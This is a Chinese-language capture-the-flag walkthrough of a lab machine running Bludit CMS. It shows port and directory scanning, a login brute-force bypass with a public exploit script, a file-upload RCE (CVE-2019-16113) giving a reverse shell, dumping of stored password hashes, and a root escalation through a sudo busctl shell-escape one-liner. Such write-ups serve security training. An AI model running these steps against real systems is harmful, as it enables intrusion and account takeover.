信息收集

服务探测

        BASH
        
      
❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e4:1a:e5       VMware, Inc.
192.168.60.135  08:00:27:9a:9b:16       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:f0:6f:4b       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.073 seconds (123.49 hosts/sec). 4 responded
❯ export ip=192.168.60.135
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
I don't always scan ports, but when I do, I prefer RustScan.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.135:22
Open 192.168.60.135:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-02 16:55 CST
Initiating ARP Ping Scan at 16:55
Scanning 192.168.60.135 [1 port]
Completed ARP Ping Scan at 16:55, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:55
Completed Parallel DNS resolution of 1 host. at 16:55, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 16:55
Scanning 192.168.60.135 [2 ports]
Discovered open port 80/tcp on 192.168.60.135
Discovered open port 22/tcp on 192.168.60.135
Completed SYN Stealth Scan at 16:55, 0.08s elapsed (2 total ports)
Nmap scan report for 192.168.60.135
Host is up, received arp-response (0.0080s latency).
Scanned at 2025-04-02 16:55:00 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:9A:9B:16 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds
           Raw packets sent: 3 (116B) | Rcvd: 27 (2.544KB)

编辑hosts文件，添加域名

        BASH
        
      
❯ echo "$ip jaulacon2025.thl"|sudo tee -a /etc/hosts
192.168.60.135 jaulacon2025.thl

枚举目录

        BASH
        
      
❯ gobuster dir -u http://jaulacon2025.thl -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://jaulacon2025.thl
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories-lowercase.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              zip,txt,php,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 301) [Size: 0] [--> http://jaulacon2025.thl/admin/]
/install.php          (Status: 200) [Size: 30]
/0                    (Status: 200) [Size: 4541]
/robots.txt           (Status: 200) [Size: 22]
Progress: 13435 / 280825 (4.78%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 13447 / 280825 (4.79%)
===============================================================
Finished
===============================================================

可以得知存在一个bludit的CMS框架

不过无法得知是什么版本的框架

POC利用爆破

但是有个admin的后台登录地址

我们可以利用这个POC进行爆破登录

Bludit 3.9.2 - Auth Bruteforce Bypass - PHP webapps Exploit

用户名就是在首页中出现过的Jaulacon2025

不过我直接运行脚本会报编码错误，改一下代码绕过编码解析错误即可

得到登录凭证Jaulacon2025:cassandra

        BASH
        
      
❯ wget https://www.exploit-db.com/download/48942
--2025-04-02 17:17:54--  https://www.exploit-db.com/download/48942
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.13
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.13|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3458 (3.4K) [application/txt]
Saving to: ‘48942’

48942                                 100%[=======================================================================>]   3.38K  --.-KB/s    in 0s

2025-04-02 17:17:55 (206 MB/s) - ‘48942’ saved [3458/3458]

❯ python3 48942.py -l http://jaulacon2025.thl/admin/login.php -u user.txt -p /usr/share/wordlists/rockyou.txt
[*] Bludit Auth BF Mitigation Bypass Script by ColdFusionX

……………………省略………………
[←] Brute Force: Testing -> Jaulacon2025:cassandra

[*] SUCCESS !!
[+] Use Credential -> Jaulacon2025:cassandra

同时在此版本下还有个通过上传插件可以获取webshell的漏洞

hg8/CVE-2019-16113-PoC: Bludit >= 3.9.2 - Authenticated RCE (CVE-2019-16113)

修改一下地址和账户凭证以及反弹地址

        BASH
        
      
❯ vi CVE-2019-16113.py
❯ python3 CVE-2019-16113.py
[+] Loggin successful.
[+] Token CSRF: 00d70f50355effa354138eb53aa41f4a257e6cad
[!] Error uploading Shell.
[!] Make sure Bludit version >= 3.9.2.
[+] Shell upload succesful.
[+] .htaccess upload succesful.
[+] Command Execution Successful.

用户提权

监听一下端口

得到两个用户debian JaulaCon2025

        BASH
        
      
❯ pwncat-cs -lp 4444
[21:41:22] Welcome to pwncat 🐈!                           __main__.py:164
[21:42:17] received connection from 192.168.60.135:34594        bind.py:84
[21:42:33] 192.168.60.135:34594: registered new host w/ db  manager.py:957
(local) pwncat$
(remote) www-data@JaulaCon2025:/var/www/html$ cat /etc/passwd |grep /bin/bash
root:x:0:0:root:/root:/bin/bash
debian:x:1000:1000:debian,,,:/home/debian:/bin/bash
JaulaCon2025:x:1001:1001::/home/JaulaCon2025:/bin/bash

再次信息收集

可以在bl-content/databases中发现用户的数据库信息

其中就包含了JaulaCon2025用户的密码hash

        BASH
        
      
(remote) www-data@JaulaCon2025:/var/www/html/bl-content/databases$ cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
    "admin": {
        "nickname": "Admin",
        "firstName": "Administrador",
        "lastName": "",
        "role": "admin",
        "password": "67def80155faa894bfb132889e3825a2718db22f",
        "salt": "67e2f74795e73",
        "email": "",
        "registered": "2025-03-25 19:34:47",
        "tokenRemember": "",
        "tokenAuth": "70b08e65a3fa16d434ca40e603c99e22",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "instagram": "",
        "codepen": "",
        "linkedin": "",
        "github": "",
        "gitlab": ""
    },
    "Jaulacon2025": {
        "firstName": "",
        "lastName": "",
        "nickname": "",
        "description": "",
        "role": "author",
        "password": "a0fcd99fe4a21f30abd2053b1cf796da628e4e7e",
        "salt": "bo22u72!",
        "email": "",
        "registered": "2025-03-25 19:43:25",
        "tokenRemember": "",
        "tokenAuth": "d1ed37a30b769e2e48123c3efaa1e357",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "codepen": "",
        "instagram": "",
        "github": "",
        "gitlab": "",
        "linkedin": "",
        "mastodon": ""
    },
    "JaulaCon2025": {
        "firstName": "",
        "lastName": "",
        "nickname": "",
        "description": "",
        "role": "author",
        "password": "551211bcd6ef18e32742a73fcb85430b",
        "salt": "jejej",
        "email": "",
        "registered": "2025-03-25 19:43:25",
        "tokenRemember": "",
        "tokenAuth": "d1ed37a30b769e2e48123c3efaa1e357",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "codepen": "",
        "instagram": "",
        "github": "",
        "gitlab": "",
        "linkedin": "",
        "mastodon": ""
    }
}

尝试在线网站爆破一下

得到凭证JaulaCon2025:Brutales

尝试登录一下

        BASH
        
      
(remote) www-data@JaulaCon2025:/var/www/html/bl-content/databases$ su JaulaCon2025
Password:
JaulaCon2025@JaulaCon2025:/var/www/html/bl-content/databases$ cd ~
JaulaCon2025@JaulaCon2025:~$ cat user.txt
368409a919088e8707d0617365156184  -
JaulaCon2025@JaulaCon2025:~$

Root提权

得知存在用户拥有sudo权限

正常提权即可

        BASH
        
      
JaulaCon2025@JaulaCon2025:~$ sudo -l
sudo: unable to resolve host JaulaCon2025: Nombre o servicio desconocido
Matching Defaults entries for JaulaCon2025 on JaulaCon2025:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User JaulaCon2025 may run the following commands on JaulaCon2025:
    (root) NOPASSWD: /usr/bin/busctl
JaulaCon2025@JaulaCon2025:~$ sudo /usr/bin/busctl set-property org.freedesktop.systemd1 /org/freedesktop/systemd1 org.freedesktop.systemd1.Manager LogLevel s debug --address=unixexec:path=/bin/sh,argv1=-c,argv2='/bin/sh -i 0<&2 1>&2'
sudo: unable to resolve host JaulaCon2025: Nombre o servicio desconocido
root@JaulaCon2025:/home/JaulaCon2025# cd ~
root@JaulaCon2025:~# cat root.txt
097fac9db83a1806f3355cf95227992a  -